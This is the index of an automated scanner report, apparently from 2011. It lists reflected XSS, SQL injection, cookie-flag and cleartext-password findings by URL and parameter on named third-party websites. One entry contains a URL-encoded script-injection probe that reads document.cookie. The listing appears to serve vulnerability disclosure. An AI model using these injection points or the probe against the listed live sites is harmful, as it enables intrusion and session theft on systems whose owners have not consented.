XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 10:53:23 CDT 2011.


Loading


1. SQL injection

1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]

1.2. http://www.oscommerce.com/about/news,135 [REST URL parameter 2]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://a.ligatus.com/timeout.php [ids parameter]

3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]

3.3. http://bid.openx.net/json [c parameter]

3.4. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv [jsoncallback parameter]

3.5. http://content-interface.iinet.net.au/async/content/play/video/high/5619 [jsoncallback parameter]

3.6. http://ds.addthis.com/red/psi/sites/www.eshopfitters.co.uk/p.json [callback parameter]

3.7. http://image.providesupport.com/cmd/chatcisp1 [REST URL parameter 1]

3.8. http://image.providesupport.com/cmd/corecommerce [REST URL parameter 1]

3.9. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 1]

3.10. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 2]

3.11. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 1]

3.12. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 2]

3.13. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]

3.14. http://js.revsci.net/gateway/gw.js [csid parameter]

3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]

3.16. http://onebox.extole.com/offers/23073174/share [extra_url_query_string parameter]

3.17. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

3.18. https://shop.widevoip.com/authentication.php [REST URL parameter 1]

3.19. https://shop.widevoip.com/authentication.php [back parameter]

3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]

3.21. https://shop.widevoip.com/cart.php [REST URL parameter 1]

3.22. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 1]

3.23. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 2]

3.24. https://shop.widevoip.com/index.php/index.php [REST URL parameter 1]

3.25. https://shop.widevoip.com/index.php/index.php [REST URL parameter 2]

3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]

3.27. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 1]

3.28. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 2]

3.29. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 3]

3.30. https://shop.widevoip.com/order.php [REST URL parameter 1]

3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]

3.32. https://shop.widevoip.com/order.php [step parameter]

3.33. https://shop.widevoip.com/prices-drop.php [REST URL parameter 1]

3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]

3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]

3.36. http://shops.oscommerce.com/live_shops_frameset_header.php [url parameter]

3.37. http://store.mandriva.com/ [action parameter]

3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]

3.39. http://store.mandriva.com/product_info.php [action parameter]

3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

3.42. http://store.mandriva.com/product_info.php [products_id parameter]

3.43. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json [callback parameter]

3.44. http://webchat.rockliffe.com:9090/webchat/live [action parameter]

3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]

3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.49. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.50. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.51. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.55. http://www.grics.qc.ca/favicon.ico [REST URL parameter 1]

3.56. http://www.grics.qc.ca/fr/produits/eleve-jeune/gpi.aspx [REST URL parameter 4]

3.57. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 1]

3.58. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 2]

3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

3.61. http://www.mailsite.com/common/reporterror.asp [Company parameter]

3.62. http://www.mailsite.com/common/reporterror.asp [Email parameter]

3.63. http://www.mailsite.com/common/reporterror.asp [Name parameter]

3.64. http://www.mailsite.com/common/reporterror.asp [Phone parameter]

3.65. http://www.mailsite.com/common/reporterror.asp [Subject parameter]

3.66. http://www.mailsite.com/common/reporterror.asp [WebPage parameter]

3.67. http://www.mailsite.com/common/reporterror.asp [webpage parameter]

3.68. http://www.mailsite.com/portal/trial.asp [Company parameter]

3.69. http://www.mailsite.com/portal/trial.asp [Email parameter]

3.70. http://www.mailsite.com/portal/trial.asp [Email2 parameter]

3.71. http://www.mailsite.com/portal/trial.asp [Ext parameter]

3.72. http://www.mailsite.com/portal/trial.asp [FirstName parameter]

3.73. http://www.mailsite.com/portal/trial.asp [LastName parameter]

3.74. http://www.mailsite.com/portal/trial.asp [MailboxQty parameter]

3.75. http://www.mailsite.com/portal/trial.asp [Phone parameter]

3.76. http://www.mailsite.com/portal/trial.asp [SourceDesc parameter]

3.77. http://www.mailsite.com/portal/trial.asp [StateText parameter]

3.78. http://www.mailsite.com/portal/trial.asp [UserName parameter]

3.79. http://www.mailsite.com/portal/trial.asp [Website parameter]

3.80. http://www.mailsite.com/portal/trial.asp [Zip parameter]

3.81. http://www.mailsite.com/portal/trial.asp [key parameter]

3.82. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm [t parameter]

3.83. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue100 parameter]

3.84. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue101 parameter]

3.85. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue102 parameter]

3.86. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue103 parameter]

3.87. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue104 parameter]

3.88. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue234 parameter]

3.89. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue89 parameter]

3.90. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue90 parameter]

3.91. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue91 parameter]

3.92. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue92 parameter]

3.93. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue93 parameter]

3.94. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue94 parameter]

3.95. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue95 parameter]

3.96. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue96 parameter]

3.97. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue97 parameter]

3.98. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue98 parameter]

3.99. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue99 parameter]

3.100. http://www.munichmyway.com/templates/common/products/productProperties.cfm [id parameter]

3.101. http://www.oscommerce-manager.com/ [8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter]

3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]

3.103. http://www.oscommerce-manager.com/PAGE-70.html [REST URL parameter 1]

3.104. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 1]

3.105. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 2]

3.106. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 1]

3.107. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 2]

3.108. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 1]

3.109. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 2]

3.110. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 3]

3.111. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 1]

3.112. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 2]

3.113. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 3]

3.114. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 4]

3.115. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 1]

3.116. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 2]

3.117. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 3]

3.118. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 1]

3.119. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 2]

3.120. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 3]

3.121. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 1]

3.122. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 2]

3.123. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 3]

3.124. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 4]

3.125. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 1]

3.126. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 2]

3.127. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 3]

3.128. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 4]

3.129. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 1]

3.130. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 2]

3.131. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 3]

3.132. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 4]

3.133. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 1]

3.134. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 2]

3.135. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 3]

3.136. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 1]

3.137. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 2]

3.138. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 3]

3.139. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 1]

3.140. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 2]

3.141. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 3]

3.142. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 1]

3.143. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 2]

3.144. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 3]

3.145. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 1]

3.146. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 2]

3.147. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 3]

3.148. http://www.oscommerce-manager.com/order [REST URL parameter 1]

3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]

3.150. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [REST URL parameter 1]

3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]

3.152. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 1]

3.153. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 2]

3.154. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 3]

3.155. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 4]

3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]

3.157. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 1]

3.158. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 2]

3.159. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 3]

3.160. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 4]

3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]

3.162. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 1]

3.163. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 2]

3.164. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 3]

3.165. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 1]

3.166. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 2]

3.167. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 3]

3.168. https://www.regnow.com/checkout/cart/edit [bill_addr.country parameter]

3.169. https://www.regnow.com/checkout/cart/edit [bill_addr.state parameter]

3.170. https://www.regnow.com/checkout/cart/edit [cc_exp_month parameter]

3.171. https://www.regnow.com/checkout/cart/edit [cc_exp_year parameter]

3.172. https://www.regnow.com/checkout/cart/edit [payment_type_def_id parameter]

3.173. https://www.regnow.com/checkout/cart/edit [ship_addr.country parameter]

3.174. https://www.regnow.com/checkout/cart/edit [ship_addr.state parameter]

3.175. http://www.vitexo.de/support/server.php [browid parameter]

3.176. http://www.vitexo.de/support/server.php [livezilla parameter]

3.177. http://www.vitexo.de/support/server.php [start parameter]

3.178. http://www.wiktel.com/events.php [bgColor parameter]

3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]

3.180. http://www.yourwebsitevalue.com/getsearchbox.cgi [Referer HTTP header]

3.181. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [vsid cookie]

3.182. http://image.providesupport.com/js/corecommerce/safe-standard.js [vsid cookie]

3.183. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.184. http://store.mandriva.com/ [osCsid cookie]

3.185. http://store.mandriva.com/g/style/base-min.css [osCsid cookie]

3.186. http://store.mandriva.com/g/style/reset-fonts-grids.css [osCsid cookie]

3.187. http://store.mandriva.com/just_added.php [osCsid cookie]

3.188. http://store.mandriva.com/product_info.php [osCsid cookie]

3.189. http://store.mandriva.com/product_info.php [osCsid cookie]

3.190. http://www.vehix.com/ [physicalzip cookie]

3.191. http://www.vehix.com/default.aspx [physicalzip cookie]

4. Flash cross-domain policy

4.1. http://ad.doubleclick.net/crossdomain.xml

4.2. http://ajax.googleapis.com/crossdomain.xml

4.3. http://c.gelifesciences.com/crossdomain.xml

4.4. http://cfe713.r.axf8.net/crossdomain.xml

4.5. http://d.xp1.ru4.com/crossdomain.xml

4.6. http://d1.openx.org/crossdomain.xml

4.7. http://fls.doubleclick.net/crossdomain.xml

4.8. http://h41174.www4.hp.com/crossdomain.xml

4.9. http://idcs.interclick.com/crossdomain.xml

4.10. http://iinet.122.2o7.net/crossdomain.xml

4.11. http://j2global.122.2o7.net/crossdomain.xml

4.12. http://js.revsci.net/crossdomain.xml

4.13. http://media.extole.com/crossdomain.xml

4.14. http://met1.hp.com/crossdomain.xml

4.15. http://now.eloqua.com/crossdomain.xml

4.16. http://onebox.extole.com/crossdomain.xml

4.17. http://pixel.fetchback.com/crossdomain.xml

4.18. http://pro.hit.gemius.pl/crossdomain.xml

4.19. http://r.turn.com/crossdomain.xml

4.20. http://segment-pixel.invitemedia.com/crossdomain.xml

4.21. http://upc.d2.sc.omtrdc.net/crossdomain.xml

4.22. http://www.burstnet.com/crossdomain.xml

4.23. http://www.odesk.com/crossdomain.xml

4.24. http://a.ligatus.com/crossdomain.xml

4.25. http://d.ligatus.com/crossdomain.xml

4.26. http://edge.sharethis.com/crossdomain.xml

4.27. http://feeds.bbci.co.uk/crossdomain.xml

4.28. http://googleads.g.doubleclick.net/crossdomain.xml

4.29. http://hc2.humanclick.com/crossdomain.xml

4.30. http://newsrss.bbc.co.uk/crossdomain.xml

4.31. http://pagead2.googlesyndication.com/crossdomain.xml

4.32. http://pubads.g.doubleclick.net/crossdomain.xml

4.33. http://tvgids.upc.nl/crossdomain.xml

4.34. http://w.sharethis.com/crossdomain.xml

4.35. http://www.hp.com/crossdomain.xml

4.36. http://www.upc.nl/crossdomain.xml

4.37. http://www.youtube.com/crossdomain.xml

4.38. http://t.tmimgcdn.com/crossdomain.xml

4.39. http://www.templatemonster.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://c.gelifesciences.com/clientaccesspolicy.xml

5.3. http://iinet.122.2o7.net/clientaccesspolicy.xml

5.4. http://j2global.122.2o7.net/clientaccesspolicy.xml

5.5. http://met1.hp.com/clientaccesspolicy.xml

5.6. http://upc.d2.sc.omtrdc.net/clientaccesspolicy.xml

5.7. http://d.ligatus.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://forum.mailsite.com/

6.2. http://www.ekkows.0479228880.com/

6.3. http://www.host7x24.com/auth/login.php

6.4. http://www.internetnatrgovina.com/

6.5. http://www.mailsite.com/portal/

6.6. http://www.mailsite.com/portal/cases/

6.7. http://www.mailsite.com/portal/cases/cases.asp

6.8. http://www.mailsite.com/portal/download.asp

6.9. http://www.mailsite.com/portal/unsubscribe.asp

6.10. http://www.mailsite.com/portal/updateprofile.asp

6.11. http://www.mavi1.org/forum/

6.12. http://www.mmabasket.com/

6.13. http://www.siyamiozkan.com.tr/forum/

7. SSL cookie without secure flag set

7.1. https://myaccount.westnet.com.au/Login.aspx

7.2. https://secure1.wn.com.au/passwordrecovery/

7.3. https://webmail.westnet.com.au/

7.4. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

7.5. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

7.6. https://www.new.onebox.com/features/mobile-apps/android

7.7. https://www.new.onebox.com/features/mobile-apps/blackberry

7.8. https://www.new.onebox.com/features/mobile-apps/iphone

7.9. https://www.new.onebox.com/login

7.10. https://www.new.onebox.com/pricing-receptionist_b

7.11. https://shop.widevoip.com/cart.php

7.12. https://shop.widevoip.com/index.php/index.php

7.13. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

7.14. https://www.regnow.com/checkout/cart/edit

7.15. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

7.16. https://www.regnow.com/checkout/cart/view

8. Session token in URL

8.1. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard

8.2. http://l.sharethis.com/pview

8.3. http://onebox.extole.com/offers/23073174/share

8.4. https://shop.widevoip.com/authentication.php

8.5. https://shop.widevoip.com/cart.php

8.6. https://shop.widevoip.com/index.php/index.php

8.7. https://shop.widevoip.com/prices-drop.php

8.8. http://www.facebook.com/extern/login_status.php

8.9. http://www.host7x24.com/auth/login.php

9. SSL certificate

9.1. https://www.widevoip.com/

9.2. https://mobile.westnet.com.au/

9.3. https://secure1.wn.com.au/

9.4. https://shop.widevoip.com/

9.5. https://www.regnow.com/

10. Cookie scoped to parent domain

10.1. http://count1.123stat.com/count.pl

10.2. http://cts-log.channelintelligence.com/

10.3. http://forums.oscommerce.com/

10.4. http://www.cvtelecom.cv/

10.5. http://www.host7x24.com/auth/login.php

10.6. http://www.host7x24.com/favicon.ico

10.7. http://www.oscommerce-manager.com/

10.8. http://www.servercentral.com/

10.9. http://a.triggit.com/pxoxicm

10.10. http://action.media6degrees.com/orbserv/hbjs

10.11. http://ad.trafficmp.com/a/bpix

10.12. http://ad.trafficmp.com/a/bpix

10.13. http://ads.revsci.net/adserver/ako

10.14. http://adserver.veruta.com/track.fcgi

10.15. http://ak1.abmr.net/is/www.burstnet.com

10.16. http://b.scorecardresearch.com/b

10.17. http://b.scorecardresearch.com/r

10.18. http://bid.openx.net/json

10.19. http://bid.openx.net/jstag

10.20. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

10.21. http://cf.addthis.com/red/p.json

10.22. http://finans.turk.net/borsa/

10.23. http://g-pixel.invitemedia.com/gmatcher

10.24. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

10.25. http://i.w55c.net/rs

10.26. http://ib.adnxs.com/seg

10.27. http://image.providesupport.com/js/chatcisp1/safe-monitor.js

10.28. http://js.revsci.net/gateway/gw.js

10.29. http://leadback.advertising.com/adcedge/lb

10.30. http://media.fastclick.net/w/tre

10.31. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

10.32. http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955

10.33. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.34. http://pix04.revsci.net/H05525/b3/0/3/1003161/484270256.js

10.35. http://pixel.fetchback.com/serve/fb/pdc

10.36. http://pixel.fetchback.com/serve/fb/ver

10.37. http://pixel.quantserve.com/pixel

10.38. http://pro.hit.gemius.pl/*/_1305465394383/rexdot.gif

10.39. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

10.40. http://pro.hit.gemius.pl/_1305465782281/rexdot.gif

10.41. http://pro.hit.gemius.pl/_1305465906407/rexdot.gif

10.42. http://r.turn.com/r/beacon

10.43. http://rs.gwallet.com/r1/pixel/x373

10.44. http://segment-pixel.invitemedia.com/pixel

10.45. http://statsomni.vehix.com/b/ss/vehixglobal/1/H.15.1/s68731433965731

10.46. http://tags.mediaforge.com/js/189

10.47. http://tracker.marinsm.com/tp

10.48. http://www.allvoip.gr/

10.49. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

10.50. http://www.ekkows.0479228880.com/

10.51. http://www.eshopfitters.co.uk/

10.52. http://www.internetnatrgovina.com/

10.53. http://www.mavi1.org/forum/

10.54. http://www.mavideniz1.org/forum/

10.55. http://www.mmabasket.com/

10.56. http://www.sapiens.co.uk/

11. Cookie without HttpOnly flag set

11.1. http://action.media6degrees.com/orbserv/hbjs

11.2. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

11.3. http://count1.123stat.com/count.pl

11.4. http://cts-log.channelintelligence.com/

11.5. http://finans.turk.net/altin/

11.6. http://finans.turk.net/borsa/

11.7. http://forum.mailsite.com/

11.8. http://freezone.iinet.net.au/channels/freezone-partners

11.9. http://host7x24.com/customer/index.php

11.10. http://myhelp.westnet.com.au/pages/releaseview.action

11.11. http://onebox.extole.com/offers/23073174/start

11.12. http://support.magneticone.com/visitor/index.php

11.13. http://www.active24.co.uk/

11.14. http://www.active24.co.uk/custom_asp/info.asp

11.15. http://www.active24.com/

11.16. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

11.17. http://www.cardinal.com/businesses/medicineshoppe/

11.18. http://www.cisp.com/default.asp

11.19. http://www.cvtelecom.cv/

11.20. http://www.grics.qc.ca/

11.21. http://www.host7x24.com/auth/login.php

11.22. http://www.host7x24.com/favicon.ico

11.23. http://www.mailsite.com/

11.24. http://www.mailsite.com/company/customers.asp

11.25. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

11.26. http://www.munichmyway.com/

11.27. http://www.munichmyway.com/favicon.ico

11.28. http://www.new.onebox.com/home

11.29. http://www.new.onebox.com/how-it-works

11.30. http://www.new.onebox.com/pricing-receptionist

11.31. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

11.32. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

11.33. https://www.new.onebox.com/features/mobile-apps/android

11.34. https://www.new.onebox.com/features/mobile-apps/blackberry

11.35. https://www.new.onebox.com/features/mobile-apps/iphone

11.36. https://www.new.onebox.com/login

11.37. https://www.new.onebox.com/pricing-receptionist_b

11.38. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

11.39. http://www.onebox.com/

11.40. http://www.oscommerce-manager.com/

11.41. http://www.redstage.com/magento2/

11.42. http://www.servercentral.com/

11.43. http://www.telecom.pt/

11.44. http://www.teleflora.com/

11.45. http://www.templatemonster.com/oscommerce-templates.php

11.46. http://www.turk.net/

11.47. http://www8.hp.com/us/en/services/it-services.html

11.48. http://www8.hp.com/us/en/services/services-detail.html

11.49. http://www8.hp.com/us/en/system/include/ladybug.jsp

11.50. http://a.triggit.com/pxoxicm

11.51. http://ad.trafficmp.com/a/bpix

11.52. http://ad.trafficmp.com/a/bpix

11.53. http://ad.yieldmanager.com/pixel

11.54. http://ads.revsci.net/adserver/ako

11.55. http://adserver.veruta.com/track.fcgi

11.56. http://ak1.abmr.net/is/www.burstnet.com

11.57. http://allvoip.gr//live_support/statusimage.php

11.58. http://b.scorecardresearch.com/b

11.59. http://b.scorecardresearch.com/r

11.60. http://bid.openx.net/json

11.61. http://bid.openx.net/jstag

11.62. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

11.63. http://cf.addthis.com/red/p.json

11.64. http://d1.openx.org/ajs.php

11.65. http://d1.openx.org/lg.php

11.66. http://g-pixel.invitemedia.com/gmatcher

11.67. http://h10134.www1.hp.com/

11.68. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

11.69. http://hc2.humanclick.com/hc/81994923/

11.70. http://hc2.humanclick.com/hc/81994923/

11.71. http://i.w55c.net/rs

11.72. http://iinet.122.2o7.net/b/ss/iinet-wn-prd,%20iinet-westnet-prd/1/H.21/s66183478690218

11.73. http://image.providesupport.com/js/chatcisp1/safe-monitor.js

11.74. http://intelligence.dgmsearchlab.com/xdom/readcook.ashx

11.75. http://j2global.122.2o7.net/b/ss/j2globalonebox/1/H.23.3/s62614785584155

11.76. http://js.revsci.net/gateway/gw.js

11.77. http://leadback.advertising.com/adcedge/lb

11.78. http://media.fastclick.net/w/tre

11.79. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

11.80. http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955

11.81. http://mods4rides.com/

11.82. http://pix04.revsci.net/D08734/a1/0/0/0.gif

11.83. http://pix04.revsci.net/H05525/b3/0/3/1003161/484270256.js

11.84. http://pixel.fetchback.com/serve/fb/pdc

11.85. http://pixel.fetchback.com/serve/fb/ver

11.86. http://pixel.quantserve.com/pixel

11.87. http://printingcanvas.co.uk/

11.88. http://pro.hit.gemius.pl/*/_1305465394383/rexdot.gif

11.89. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

11.90. http://pro.hit.gemius.pl/_1305465782281/rexdot.gif

11.91. http://pro.hit.gemius.pl/_1305465906407/rexdot.gif

11.92. http://r.turn.com/r/beacon

11.93. http://rs.gwallet.com/r1/pixel/x373

11.94. http://segment-pixel.invitemedia.com/pixel

11.95. https://shop.widevoip.com/cart.php

11.96. https://shop.widevoip.com/index.php/index.php

11.97. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

11.98. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

11.99. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

11.100. http://statsomni.vehix.com/b/ss/vehixglobal/1/H.15.1/s68731433965731

11.101. http://store.mandriva.com/

11.102. http://tags.mediaforge.com/js/189

11.103. http://telefloracom.112.2o7.net/b/ss/telefloracom/1/H.20.3/s66253762478008

11.104. http://tracker.marinsm.com/tp

11.105. http://upc.d2.sc.omtrdc.net/b/ss/upcnl/1/H.22.1/s73489850417245

11.106. http://whatsonsingapore.com/

11.107. http://www.acceleart.com/shop/

11.108. http://www.accesscontrolid.com/catalog/index.php

11.109. http://www.active24.co.uk/sw22729.asp

11.110. http://www.allvoip.gr/

11.111. http://www.amberetc.co.uk/ws/

11.112. http://www.amershambiosciences.com/

11.113. http://www.brodit24.de/

